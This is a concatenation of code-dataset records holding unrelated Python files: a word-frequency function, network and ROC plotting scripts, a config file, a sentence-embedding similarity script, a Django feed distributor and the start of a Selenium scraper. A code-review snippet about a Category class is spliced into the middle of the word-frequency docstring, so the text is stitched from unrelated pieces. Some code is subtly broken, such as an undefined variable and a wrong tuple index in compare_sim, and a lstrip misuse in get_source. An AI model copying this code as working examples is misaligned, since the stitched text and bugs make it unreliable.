these 'documents'; views, retweets, sales, etc.\n :param regex: string.\n The regex used to split words. 
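`Category.__str__` above formats `parent/title` and then strips a literal `'None/'` prefix with `re.sub` for root categories. A conditional avoids the string surgery, and cannot misfire on a category that happens to be named "None":

```python
def category_name(parent_name, title):
    return f"{parent_name}/{title}" if parent_name else title

assert category_name(None, "News") == "News"
assert category_name("News", "Local") == "News/Local"
```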
Doesn't need changing in most cases.\n :param phrase_len: integer, the length in words of each token the\n text is split into, defaults to 1.\n :param rm_words: iterable of strings.\n Words to remove from the list 'stop-words'. The default uses\n ``spacy``'s list of English stopwords. To get all available languages\n run ``adv.stopwords.keys()``\n :param extra_info: boolean.\n Whether or not to give additional columns about the frequencies\n :returns abs_wtd_df: absolute and weighted DataFrame.\n pandas.DataFrame with several metrics calculated. The most important\n are ``abs_freq`` and ``wtd_freq``. These show the difference between\n the number of occurrences of each word together with their respective\n weighted occurrences (frequency vs. weighted frequency). Other metrics\n are also provided. The columns are as follows:\n\n word: Word.\n Words in the document list each on its own row. The length of\n these words is determined by ``token_word_len``, essentially\n phrases if containing more than one word each.\n abs_freq: Absolute frequency.\n The number of occurrences of each word in all the documents.\n wtd_freq: Weighted frequency.\n Every occurrence of ``word`` multiplied by its respective value in\n ``num_list`` provided by the function call.\n rel_value: Relative value.\n ``wtd_freq`` divided by ``abs_freq``, showing the value per\n occurrence of ``word``\n\n :extra_info:\n\n abs_perc: Absolute frequency percentage.\n ``abs_freq`` divided by the sum of all occurrences of words.\n abs_perc_cum: Cumulative absolute percentage.\n Cumulative sum of ``abs_perc`` to see how many words form x% of\n the occurrences.\n wtd_freq_perc: ``wtd_freq`` divided by the total weighted frequencies\n of all words.\n wtd_freq_perc_cum: Cumulative weighted frequncy percentage.\n Cumulative sum of ``wtd_freq_perc`` to see how many words form x%\n of the weighted occurrences.\n\n >>> text_list = ['apple orange', 'apple orange banana',\n ... 'apple kiwi', 'kiwi mango']\n >>> num_list = [100, 100, 100, 400]\n\n >>> adv.word_frequency(text_list, num_list)\n word abs_freq wtd_freq rel_value\n 0 kiwi 2 500 250.0\n 1 mango 1 400 400.0\n 2 apple 3 300 100.0\n 3 orange 2 200 100.0\n 4 banana 1 100 100.0\n\n \"kiwi\" occurred twice (abs_freq), one of these phrases has a score of 100,\n and the other 400, so the wtd_freq is the sum (100 + 400 = 500)\n\n >>> adv.word_frequency(text_list) # num_list values default to 1 each\n word abs_freq wtd_freq rel_value\n 0 apple 3 3 1.0\n 1 orange 2 2 1.0\n 2 kiwi 2 2 1.0\n 3 banana 1 1 1.0\n 4 mango 1 1 1.0\n\n >>> text_list2 = ['my favorite color is blue',\n ... 'my favorite color is green', 'the best color is green',\n ... 
'i love the color black']\n\n Setting ``token_word_len`` to 2, \"words\" become two-word phrases instead:\n\n >>> word_frequency(text_list2, token_word_len=2, rm_words=[])\n word abs_freq wtd_freq rel_value\n 0 color is 3 3 1.0\n 1 my favorite 2 2 1.0\n 2 favorite color 2 2 1.0\n 3 is green 2 2 1.0\n 4 is blue 1 1 1.0\n 5 the best 1 1 1.0\n 6 best color 1 1 1.0\n 7 i love 1 1 1.0\n 8 love the 1 1 1.0\n 9 the color 1 1 1.0\n 10 color black 1 1 1.0\n\n >>> adv.word_frequency(text_list, num_list, extra_info=True)\n word abs_freq abs_perc abs_perc_cum wtd_freq wtd_freq_perc wtd_freq_perc_cum rel_value\n 0 kiwi 2 0.222222 0.222222 500 0.333333 0.333333 250.0\n 1 mango 1 0.111111 0.333333 400 0.266667 0.600000 400.0\n 2 apple 3 0.333333 0.666667 300 0.200000 0.800000 100.0\n 3 orange 2 0.222222 0.888889 200 0.133333 0.933333 100.0\n 4 banana 1 0.111111 1.000000 100 0.066667 1.000000 100.0\n\n This is the same result as above but giving the full DataFrame including\n all columns.\n \"\"\"\n if num_list is None:\n num_list = [1 for i in range(len(text_list))]\n if isinstance(regex, str):\n regex = re.compile(regex)\n text_list = [' '.join(regex.findall(text)) for text in text_list]\n\n word_freq = defaultdict(lambda: [0, 0])\n\n for text, num in zip(word_tokenize(text_list, phrase_len=phrase_len),\n num_list):\n for word in text:\n if word.lower() in rm_words:\n continue\n word_freq[word.lower()][0] += 1\n word_freq[word.lower()][1] += num\n\n columns = ['abs_freq', 'wtd_freq']\n\n abs_wtd_df = (pd.DataFrame.from_dict(word_freq, orient='index',\n columns=columns)\n .sort_values('wtd_freq', ascending=False)\n .assign(rel_value=lambda df: df['wtd_freq'] / df['abs_freq'])\n .round())\n if extra_info:\n abs_wtd_df.insert(1, 'abs_perc', value=abs_wtd_df['abs_freq'] /\n abs_wtd_df['abs_freq'].sum())\n abs_wtd_df.insert(2, 'abs_perc_cum', abs_wtd_df['abs_perc'].cumsum())\n abs_wtd_df.insert(4, 'wtd_freq_perc', abs_wtd_df['wtd_freq'] /\n abs_wtd_df['wtd_freq'].sum())\n abs_wtd_df.insert(5, 'wtd_freq_perc_cum',\n abs_wtd_df['wtd_freq_perc'].cumsum())\n\n abs_wtd_df = abs_wtd_df.reset_index().rename(columns={'index': 'word'})\n\n return abs_wtd_df\n","sub_path":"advertools/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":7174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"609799341","text":"import os\r\nimport csv\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\n\r\n\r\ndef visualize_graph(G, with_world_map = True):\r\n \r\n if with_world_map:\r\n \r\n m = bm.Basemap(width=5.e6, height=3.e6, projection='cyl', lat_0=0, lon_0=0)\r\n \r\n m.drawcoastlines(linewidth=0.5)\r\n m.drawmapboundary(fill_color='whitesmoke', linewidth=0.5)\r\n m.fillcontinents(color='white', lake_color='whitesmoke')\r\n m.drawcountries(linewidth=0.5)\r\n m.drawstates(linewidth=0.5)\r\n \r\n lats = [coord[0] for coord in coords]\r\n lons = [coord[1] for coord in coords]\r\n \r\n py, px = m(lats, lons)\r\n pos = zip(px, py)\r\n layout = dict(zip(G, pos))\r\n \r\n regulating_constant = 1e3\r\n node_sizes = [(cases/population)*regulating_constant for (cases, population) in zip(covid_cases, populations)]\r\n nx.draw_networkx(G, pos=layout, width=1.0, node_size=node_sizes, node_color=colors, edge_color='red', with_labels=False)\r\n \r\n else:\r\n regulating_constant = 3e4\r\n node_sizes = [(cases/population)*regulating_constant for (cases, population) in zip(covid_cases, populations)]\r\n 
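One detail worth noting in the docstring above: the prose and the `text_list2` example refer to a `token_word_len` argument, while the signature names it `phrase_len`, so that doctest as written would raise `TypeError`. The counting core itself, re-implemented without pandas or the advertools tokenizer:

```python
from collections import defaultdict

def word_frequency(texts, nums=None, stopwords=()):
    nums = nums or [1] * len(texts)
    freq = defaultdict(lambda: [0, 0])    # word -> [abs_freq, wtd_freq]
    for text, num in zip(texts, nums):
        for word in text.lower().split():
            if word in stopwords:
                continue
            freq[word][0] += 1            # one more occurrence
            freq[word][1] += num          # weighted by the document's number
    return dict(freq)

f = word_frequency(["apple orange", "apple kiwi"], [100, 400])
assert f["apple"] == [2, 500]
```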
nx.draw_networkx(G,width=1.0, node_size=node_sizes)\r\n \r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n# this line solves bug related to PROJ_LIB\r\n#os.environ['PROJ_LIB'] = \"C:\\\\ProgramData\\\\Anaconda3\\\\Library\\\\share\"\r\n\r\n# Federico: Custom change. Using an Ubuntu pc.\r\nos.environ['PROJ_LIB'] = \"/home/fico/anaconda3/share/proj/\"\r\n\r\nimport mpl_toolkits.basemap as bm\r\n\r\n# get list of files with trade info from country_files_detailed_summary folder\r\ncountry_files = os.listdir(os.getcwd()+'/'+'country_files_detailed_summary')\r\ncountry_files = ['country_files_detailed_summary/' + file_name for file_name in country_files]\r\n\r\n# create graph\r\nG = nx.DiGraph()\r\n\r\n# create countries lists\r\nrelevant_countries = ['Argentina', 'Belgium', 'Brazil', 'Chile', 'Colombia', 'Czech Republic', 'France', 'Netherlands', 'Peru', 'Spain', 'United Kingdom', 'United States']\r\nrelevant_countries = ['ARG', 'BEL', 'BRA', 'CHI', 'COL', 'CZR', 'FRA', 'NET', 'PER', 'SPA', 'UK', 'US']\r\n\r\n# countries values follow the same order as relevant_countries list\r\ncovid_cases = [1.24e6, 494e3, 5.65e6, 522e3, 1.14e6, 411e3, 1.79e6, 410e3, 918e3, 1.33e6, 1.19e6, 10e6]\r\n#populations = {'Argentina':44.49e6, 'Belgium':11.46e6, 'Brazil':209.5e6, 'Chile':18.73e6, 'Colombia':49.65e6, 'Czech Republic':10.65e6, 'France':66.99e6, 'Netherlands':17.28e6, 'Peru':31.99e6, 'Spain':46.94e6, 'United Kingdom':66.65e6, 'United States':328.2e6}\r\npopulations = [44.49e6, 11.46e6, 209.5e6, 18.73e6, 49.65e6, 10.65e6, 66.99e6, 17.28e6, 31.99e6, 46.94e6, 66.65e6, 328.2e6]\r\n\r\ncoords = [[-38.4161, -63.6167], [50.50389, 4.469936], [-14.235, -51.9253], [-35.6751, -71.543], [4.570868, -74.2973], [49.817492, 15.472962], [46.227638, 2.213749], [52.132633, 5.291266], [-9.189967, -75.015152], [40.463667, -3.74922], [55.378051, -3.435973], [37.09024, -95.712891]]\r\ncolors = ['blue', 'cyan', 'blue', 'blue', 'blue', 'blue', 'black', 'yellow', 'blue', 'green', 'blue', 'blue']\r\n\r\n# add nodes\r\nG.add_nodes_from(relevant_countries)\r\n\r\n\r\nfor i in range(len(country_files)): # for each file \r\n with open(country_files[i], encoding=\"utf-8\") as file: # open file\r\n \r\n reader = csv.reader(file, delimiter=',')\r\n headers = next(reader, None) # ignore headers\r\n \r\n \r\n for row in reader: # for each row\r\n \r\n # if countries in relation are in relevant_countries\r\n if row[0] in relevant_countries and row[1] in relevant_countries: \r\n \r\n if row[3] == 'Export': # if relation is export, add edge country_0 -> country_1\r\n G.add_edge(row[0], row[1])\r\n print(row[0], '-->' ,row[1]) \r\n \r\n elif row[3] == 'Import': # if relation is export, add edge country_1 -> country_0\r\n G.add_edge(row[1], row[0])\r\n print(row[1], '-->' ,row[0])\r\n\r\n\r\nvisualize_graph(G, False)\r\n","sub_path":"ECE595/project_4/proj3_dir.py","file_name":"proj3_dir.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"41209302","text":"'''\r\nRun data analysis on exported contamination results\r\n'''\r\n## General imports\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os,inspect\r\nimport math\r\n\r\n# Get this current script file's directory:\r\nloc = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\r\n# Set working directory\r\nos.chdir(loc)\r\nfrom myFunctions import gen_FTN_data\r\nfrom meSAX import *\r\n\r\n# from dtw_featurespace import *\r\n# from dtw import dtw\r\n# from fastdtw import 
fastdtw\r\n\r\n# to avoid tk crash\r\nimport matplotlib\r\nmatplotlib.use('Qt5Agg')\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\n## Function\r\n\r\ndef parse_pivot_from_file(file, data_row, data_col, mode=0):\r\n    '''\r\n    inputs:\r\n        file: file location path\r\n        data_row: data content starting row\r\n        data_col: data content starting column\r\n        mode: the format of the pivot table in the file;\r\n            if column names are stacked at the end of the index (row) names, use mode = 0 (default)\r\n            if column names are stacked at the start of the index (row) names, use mode = 1\r\n            For pivot_tables saved to csv by pandas, use mode = 0\r\n    outputs:\r\n        df_load: recovered pivot table loaded from file\r\n    '''\r\n    import numpy as np\r\n    import pandas as pd\r\n\r\n    y_e = data_row - 1 # ending col name position\r\n    x_e = data_col - 1 # ending row name position\r\n\r\n    df = pd.read_csv(file, header=None)\r\n\r\n    # reconstruct pivot table from csv file:\r\n    arr = np.array(df)\r\n    data_arr = arr[data_row:, data_col:] # data content values\r\n\r\n    # multi index rows\r\n    # locate row names: scan right-to-left for the first empty cell,\r\n    # then step forward to the first actual name cell\r\n    for x_s in range(x_e, -1, -1):\r\n        if str(arr[y_e, x_s]) == '' or str(arr[y_e, x_s]) == 'nan':\r\n            x_s += 1\r\n            break\r\n    row_names = arr[y_e, x_s:x_e+1]\r\n\r\n    # generate levels\r\n    multirow_shape = (arr.shape[0] - data_row, len(row_names))\r\n    mirow_arr = np.empty(multirow_shape, dtype=object)\r\n\r\n    for col, row_name in enumerate(row_names):\r\n        # x_s + col is the absolute column index of this index level\r\n        row = [x for x in arr[data_row:, x_s + col] if not (str(x) == '' or str(x) == 'nan')]\r\n        n = int(multirow_shape[0]/len(row))\r\n\r\n        for i in range(len(row)):\r\n            s = i*n\r\n            e = s + n\r\n            mirow_arr[s:e, col] = np.array([row[i] for x in range(n)])\r\n\r\n    miindex = pd.MultiIndex.from_arrays(mirow_arr.T, names=row_names)\r\n\r\n\r\n    # multi index columns\r\n    # locate col names\r\n    x_loc = x_s if mode == 0 else x_e # mode\r\n    for y_s in range(y_e, -1, -1):\r\n        if str(arr[y_s, x_loc]) == '' or str(arr[y_s, x_loc]) == 'nan':\r\n            y_s += 1\r\n            break\r\n    col_names = arr[y_s:y_e, x_loc]\r\n\r\n    # generate levels\r\n    multicol_shape = (len(col_names), arr.shape[1] - data_col)\r\n    micol_arr = np.empty(multicol_shape, dtype=object)\r\n\r\n    for row, col_name in enumerate(col_names):\r\n        # y_s + row is the absolute row index of this column-name level\r\n        col = [x for x in arr[y_s + row, data_col:] if not (str(x) == '' or str(x) == 'nan')]\r\n        n = int(multicol_shape[1]/len(col))\r\n\r\n        for i in range(len(col)):\r\n            s = i*n\r\n            e = s + n\r\n            micol_arr[row, s:e] = np.array([col[i] for x in range(n)])\r\n\r\n    micolumns = pd.MultiIndex.from_arrays(micol_arr, names=col_names)\r\n\r\n    # recovered data frame\r\n    df_load = pd.DataFrame(data_arr, index=miindex, columns=micolumns)\r\n\r\n    return df_load\r\n## Load data\r\n\r\nfile = r'L:\\HVAC_ModelicaModel_Data\\python_figs\\HVACv6a_3room_Boston+SmallOffice\\all_contamination_classified.csv'\r\ndata_row = 4\r\ndata_col = 2\r\n\r\ndf = parse_pivot_from_file(file, data_row, data_col, mode=0)\r\n\r\n# rows\r\nalgorithms = df.index.levels[0] # 'IsolationForest', 'LOF'\r\ncontam_level = df.index.levels[1] # '0.001', ... etc\r\n\r\n# columns\r\nexperiments = df.columns.levels[0] # 130_HVACv4a_Boston+SmallOffice_Workday... 
etc\r\ndist_measures = df.columns.levels[1] # 'Euclidean', 'High-low'\r\nrates = df.columns.levels[2] # 'Fault detection rate', 'Normal operation rate'\r\n\r\n## TPR, FPRs\r\n# set anomaly algorithm, experiment(fault type), and distance measure\r\nnorm_exp_index = 0\r\nTPR = df.loc[algorithms[1]][experiments[norm_exp_index]][dist_measures[0]][rates[1]]\r\nFPR = df.loc[algorithms[1]][experiments[3]][dist_measures[0]][rates[1]]\r\ncontams = list(TPR.index)\r\n\r\nTPR = list(TPR)\r\nFPR = list(FPR)\r\n\r\nTPR.insert(0,0)\r\nTPR.append(100)\r\nFPR.insert(0,0)\r\nFPR.append(100)\r\ncontams.insert(0,0)\r\ncontams.append(100)\r\n\r\ncoords = np.array([FPR,TPR,contams],dtype=float).T\r\n# coords.sort(axis=0)\r\n\r\n# sort with numpy using structured array\r\ndtype = [('FPR',float),('TPR',float),('contamination',float)]\r\ncoords_struct = np.empty(len(TPR),dtype)\r\ncoords_struct['TPR'] = TPR\r\ncoords_struct['FPR'] = FPR\r\ncoords_struct['contamination'] = contams\r\ncoords_struct.sort(order='FPR')\r\n\r\n# sort with pandas\r\ncoords_df = pd.DataFrame(coords,columns = ['FPR','TPR','contaminations'])\r\ncoords_sorted = coords_df.sort_values(by=['FPR'])\r\n\r\n# plot\r\nplt.figure()\r\nplt.scatter(FPR,TPR)\r\n# plt.plot(coords[:,0],coords[:,1])\r\nplt.plot(coords_struct['FPR'],coords_struct['TPR'])\r\nplt.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n# add contamination label\r\npre_x, pre_y = np.nan,np.nan # x,y coordinates of previous step\r\nfor i in range(1,len(TPR)-1):\r\n # plt.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n \r\n # plot label text only if coords changed to avoid text overlays\r\n if not (pre_x == coords_struct['FPR'][i] and pre_y == coords_struct['TPR'][i]):\r\n plt.text(coords_struct['FPR'][i],coords_struct['TPR'][i],coords_sorted['contaminations'][i])\r\n pre_x = coords_struct['FPR'][i]\r\n pre_y = coords_struct['TPR'][i]\r\n\r\nplt.xlabel('FPR(%)')\r\nplt.ylabel('TPR(%)')\r\nplt.xlim(-5,105)\r\nplt.ylim(-5,105)\r\nplt.show()\r\n\r\n##\r\n\r\n# exp_list = experiments[[3,4,5,6,8,9]]\r\nexp_list = experiments\r\n# rename the experiments for plots only\r\nexp_names = ['Normal',\r\n 'Fault 1',\r\n 'Fault 2',\r\n 'Fault 3',\r\n 'Fault 4',\r\n 'Fault 5',\r\n ]\r\n \r\n# plot subplots\r\nfor e,experiment in enumerate(exp_list):\r\n # plt.figure()\r\n fig,axes = plt.subplots(2,2,sharex='all', sharey='all')\r\n for d,d_measure in enumerate(dist_measures):\r\n for a,aa in enumerate(algorithms):\r\n TPR = df.loc[algorithms[a]][experiments[norm_exp_index]][dist_measures[d]][rates[1]]\r\n FPR = df.loc[algorithms[a]][experiment][dist_measures[d]][rates[1]]\r\n contams = list(TPR.index)\r\n \r\n TPR = list(TPR)\r\n FPR = list(FPR)\r\n # add starting and ending BCs\r\n TPR.insert(0,0)\r\n TPR.append(100)\r\n FPR.insert(0,0)\r\n FPR.append(100)\r\n contams.insert(0,0)\r\n contams.append(100)\r\n \r\n # coordinate array\r\n coords = np.array([FPR,TPR,contams],dtype=float).T\r\n \r\n # sort with numpy using structured array\r\n dtype = [('FPR',float),('TPR',float),('contamination',float)]\r\n coords_struct = np.empty(len(TPR),dtype)\r\n coords_struct['TPR'] = TPR\r\n coords_struct['FPR'] = FPR\r\n coords_struct['contamination'] = contams\r\n coords_struct.sort(order='FPR')\r\n \r\n # plot\r\n ax = axes[a,d]\r\n ax.scatter(coords_struct['FPR'],coords_struct['TPR'])\r\n ax.plot(coords_struct['FPR'],coords_struct['TPR'])\r\n # ax.plot(coords[:,0],coords[:,1])\r\n ax.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n # # add contamination label\r\n # for i in 
range(1,len(TPR)-1):\r\n # ax.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n ax.set_xlim(-5,105)\r\n ax.set_ylim(-5,105)\r\n ax.set_xlabel('FPR(%)')\r\n ax.set_ylabel('TPR(%)')\r\n ax.set_title('{} with {} distance'.format(aa,d_measure))\r\n # fig.set_tight_layout('tight')\r\n fig.suptitle('{}'.format(exp_names[e]))\r\n plt.show()\r\n\r\n\r\n# plot overlay plots\r\nfor e,experiment in enumerate(exp_list):\r\n plt.figure()\r\n # fig,axes = plt.subplots(2,2,sharex='all', sharey='all')\r\n for d,d_measure in enumerate(dist_measures):\r\n for a,aa in enumerate(algorithms):\r\n TPR = df.loc[algorithms[a]][experiments[norm_exp_index]][dist_measures[d]][rates[1]]\r\n FPR = df.loc[algorithms[a]][experiment][dist_measures[d]][rates[1]]\r\n contams = list(TPR.index)\r\n \r\n TPR = list(TPR)\r\n FPR = list(FPR)\r\n # add starting and ending BCs\r\n TPR.insert(0,0)\r\n TPR.append(100)\r\n FPR.insert(0,0)\r\n FPR.append(100)\r\n contams.insert(0,0)\r\n contams.append(100)\r\n \r\n # coordinate array\r\n coords = np.array([FPR,TPR,contams],dtype=float).T\r\n \r\n # sort with numpy using structured array\r\n dtype = [('FPR',float),('TPR',float),('contamination',float)]\r\n coords_struct = np.empty(len(TPR),dtype)\r\n coords_struct['TPR'] = TPR\r\n coords_struct['FPR'] = FPR\r\n coords_struct['contamination'] = contams\r\n coords_struct.sort(order='FPR')\r\n \r\n # plot\r\n \r\n plt.scatter(coords_struct['FPR'],coords_struct['TPR'],\r\n label='{} with {} distance'.format(aa,d_measure))\r\n plt.plot(coords_struct['FPR'],coords_struct['TPR'])\r\n \r\n plt.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n # # add contamination label\r\n # for i in range(1,len(TPR)-1):\r\n # ax.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n \r\n # ax.set_title('{} with {} distance'.format(aa,d_measure))\r\n plt.xlim(-5,105)\r\n plt.ylim(-5,105)\r\n plt.xlabel('FPR(%)')\r\n plt.ylabel('TPR(%)')\r\n plt.title('{}'.format(exp_names[e]))\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n\r\n# plot subplots of overlay plots \r\nfig,axes = plt.subplots(3,2,sharex='all', sharey='all')\r\nfor e,experiment in enumerate(exp_list):\r\n for d,d_measure in enumerate(dist_measures):\r\n for a,aa in enumerate(algorithms):\r\n TPR = df.loc[algorithms[a]][experiments[norm_exp_index]][dist_measures[d]][rates[1]]\r\n FPR = df.loc[algorithms[a]][experiment][dist_measures[d]][rates[1]]\r\n contams = list(TPR.index)\r\n \r\n TPR = list(TPR)\r\n FPR = list(FPR)\r\n # add starting and ending BCs\r\n TPR.insert(0,0)\r\n TPR.append(100)\r\n FPR.insert(0,0)\r\n FPR.append(100)\r\n contams.insert(0,0)\r\n contams.append(100)\r\n \r\n # coordinate array\r\n coords = np.array([FPR,TPR,contams],dtype=float).T\r\n \r\n # sort with numpy using structured array\r\n dtype = [('FPR',float),('TPR',float),('contamination',float)]\r\n coords_struct = np.empty(len(TPR),dtype)\r\n coords_struct['TPR'] = TPR\r\n coords_struct['FPR'] = FPR\r\n coords_struct['contamination'] = contams\r\n coords_struct.sort(order='FPR')\r\n \r\n # plot\r\n ax = axes.reshape(6,)[e]\r\n ax.scatter(coords_struct['FPR'],coords_struct['TPR'],\r\n label='{} with {} distance'.format(aa,d_measure))\r\n ax.plot(coords_struct['FPR'],coords_struct['TPR'])\r\n # ax.plot(coords[:,0],coords[:,1])\r\n ax.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n # # add contamination label\r\n # for i in range(1,len(TPR)-1):\r\n # ax.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n \r\n # fig.set_tight_layout('tight')\r\n 
ax.set_xlim(-5,105)\r\n ax.set_ylim(-5,105)\r\n if e in [4,5]: ax.set_xlabel('FPR(%)')\r\n ax.set_ylabel('TPR(%)')\r\n ax.set_title('{}'.format(exp_names[e]))\r\n if e==1: ax.legend()\r\n# plt.legend(loc = 'best') # bbox (x, y, width, height)\r\n# fig.suptitle('AUROC')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"plot_results_3room.py","file_name":"plot_results_3room.py","file_ext":"py","file_size_in_byte":12466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"549495404","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2019/1/9 15:02\n@Author : Zhangyu\n@Email : zhangycqupt@163.com\n@File : config.py\n@Software: PyCharm\n@Github : zhangyuo\n\"\"\"\n\n# train data\nTRAIN_DATA_PATH_NEG = '../data/rt-polaritydata/rt-polarity.neg'\nTRAIN_DATA_PATH_POS = '../data/rt-polaritydata/rt-polarity.pos'\n# test data\nTEST_DATA_PATH_NEG = '../data/test_data/rt-polarity.neg'\nTEST_DATA_PATH_POS = '../data/test_data/rt-polarity.pos'\n\n# model Hyperparameters\n# percentage of the training data to use for validation\ndev_sample_percentage = 0.1\n# dropout keep_prob\ndropout = 0.5\n# word embedding dim\nembedding_dim = 256\n# comma-separated filter sizes\nfilter_sizes = 3, 4, 5\n# number of filters per filter size\nnum_filters = 128\n# l2 regularization lambda\nl2_reg_lambda = 0.5\n# Adam/Adadelta/Adagrad/RMSProp/Momentum/SGD\noptimizer = \"Adam\"\n# learning rate\nlr = 1e-3\n# gradient clipping\ngrad_clip = 5.0\n\n# training parameters\n# number of checkpoints to store\nnum_checkpoints = 5\n# batch Size\nbatch_size = 128\n# number of training epochs\nnum_epochs = 200\n# evaluate model on dev set after this many steps\nevaluate_every = 100\n# save model after this many steps\ncheckpoint_every = 100\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"436129855","text":"import time, sys, pickle\nfrom multiprocessing import Value\nimport numpy as np\nfrom math import ceil\nimport concurrent.futures\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nUSE_folder = \"/home/vlead/USE\"\nembeds, words = [], []\ndef extractUSEEmbeddings(words):\n\n embed = hub.KerasLayer(USE_folder)\n word_embeddings = embed(words)\n return word_embeddings.numpy()\n\ndef compare_sim(word_to_compare):\n global embeds, words\n max_sim = -1000\n closest_word = \"\"\n for i,w in enumerate(embeds):\n sim = np.dot(word_to_compare, w)\n if sim > max_sim:\n max_sim = sim\n closest_word = words[i]\n print (\"Original word: \", word, \"Closest Word: \", closest_word, \"Sim: \", max_sim)\n return (closest_word, max_sim)\n\ndef run():\n global embeds, words\n f = open(\"../junk/failed_words\", \"rb\") \n failed, words = pickle.load(f)\n\n len_part = 10000\n n_parts = ceil(len(words)/len_part)\n closest_word = \"\"\n embeds = []\n for i in range(n_parts):\n print (float(i*100/n_parts))\n words_part = words[i*len_part:(i+1)*len_part]\n embeds.append(extractUSEEmbeddings(words_part))\n\n f = open(\"../junk/use_embeddings\", \"wb\")\n pickle.dump(embeds, f)\n\n resolved = dict()\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for res in executor.map(compare_sim, failed):\n resolved[res[0]] = (res[1], res[2])\n\n f = open(\"../junk/use_resolved\", \"wb\")\n pickle.dump(resolved, f)\n return\n\nif __name__ == \"__main__\": \n 
run()\n","sub_path":"OntoEnricher/src/extract_use_embeddings.py","file_name":"extract_use_embeddings.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"330708696","text":"#coding=utf-8\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom main.models import Item, KeyValue, Channel, Channel_Source, Channel_Feed\nimport urlparse\nfrom datetime import datetime, timedelta\nfrom multidb.pinning import use_master\nfrom django.core.cache import cache\n\nclass Command(BaseCommand):\n \"\"\"\n Distribute items from recent week for both popular and recent news \n While this process is running, it should not disrupt the ranking abruptly \n Purge news that are not with 7 days and that is lower than min_share_count from Channel_Feed\n Should be called after crawl_feed.py\n \"\"\"\n args = ''\n help = 'no args'\n\n @use_master\n def handle(self, *args, **options):\n self.stdout.write('Start distributing items\\n')\n distribute_channel_feed() \n self.stdout.write('Finished distributing items\\n')\n\n\ndef distribute_channel_feed():\n channel_sources = Channel_Source.objects.filter(enabled=True)\n source_dict = {} # A dictionary of lists\n for cs in channel_sources:\n if cs.source in source_dict:\n source_dict[cs.source].append(cs.channel_id)\n else:\n source_dict[cs.source] = [cs.channel_id]\n \n \n min_count_dict = {}\n channels = Channel.objects.all()\n for c in channels:\n min_count_dict[c.id] = c.min_share_count\n \n time_ago = datetime.now() - timedelta(days=3)\n items = Item.objects.filter(create_date__gte=time_ago)\n for item in items:\n item_source = get_source(item.url)\n if item.channels or item_source in source_dict :\n if item.channels:\n channel_ids = [int(x) for x in item.channels.split(',')]\n else:\n channel_ids = source_dict[item_source] # a list of channel ids\n item.channels = ','.join([str(x) for x in channel_ids])\n item.save() #save for next time reference\n for channel_id in channel_ids: #distribute to different channels if passing min_share_count of that channel\n if item.share_count + item.sina_count >= min_count_dict[channel_id]:\n try:\n channel_feed = Channel_Feed.objects.get(channel__pk=channel_id, item__pk=item.id)\n except: #Does not exist, create new\n channel_feed = Channel_Feed()\n channel_feed.channel_id = channel_id\n channel_feed.item_id = item.id\n channel_feed.create_date = item.create_date\n \n #For new ones:fill in the cout; For existing ones: update the count\n channel_feed.share_count = item.share_count\n channel_feed.sina_count = item.sina_count\n channel_feed.save() \n \n #First stage: Clean up feeds in channels that are some days ago\n #Second Stage:Clean up feeds that isn't within top 100\n for c in channels:\n channel_feeds = Channel_Feed.objects.filter(channel__pk=c.id)\n for channel_feed in channel_feeds:\n if channel_feed.create_date < time_ago:\n #!!! BE CAREFUL HERE. 
It's fine to delete it now since we don't show channel feed\n # but instead use Item model; If we use redundant info in channel_feed later, then \n # it's likely user clicks on an item but gets 500 error!\n channel_feed.delete()\n \n channel_feeds = Channel_Feed.objects.filter(channel__pk=c.id).order_by('sina_count', 'share_count')\n if channel_feeds:\n cf = channel_feeds[0]\n if len(channel_feeds) < 100: #set a lower threshold to allow more items\n c.min_share_count = (cf.share_count + cf.sina_count)/10\n else:\n c.min_share_count = cf.share_count + cf.sina_count\n c.save()\n \ndef get_source(url):\n parts = urlparse.urlparse(url)\n return parts.netloc.lstrip('www.')","sub_path":"main/management/commands/distribute_channel_feed.py","file_name":"distribute_channel_feed.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"444586734","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.firefox.options import Options\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nimport csv, os, time\n\nfrom datetime import timedelta, date, datetime\nstart_date = date(2014, 1, 1)\nend_date = date(2018, 6, 1)\nacceptTournaments = set()\ntournamentSelectorOn = True\n#matches = 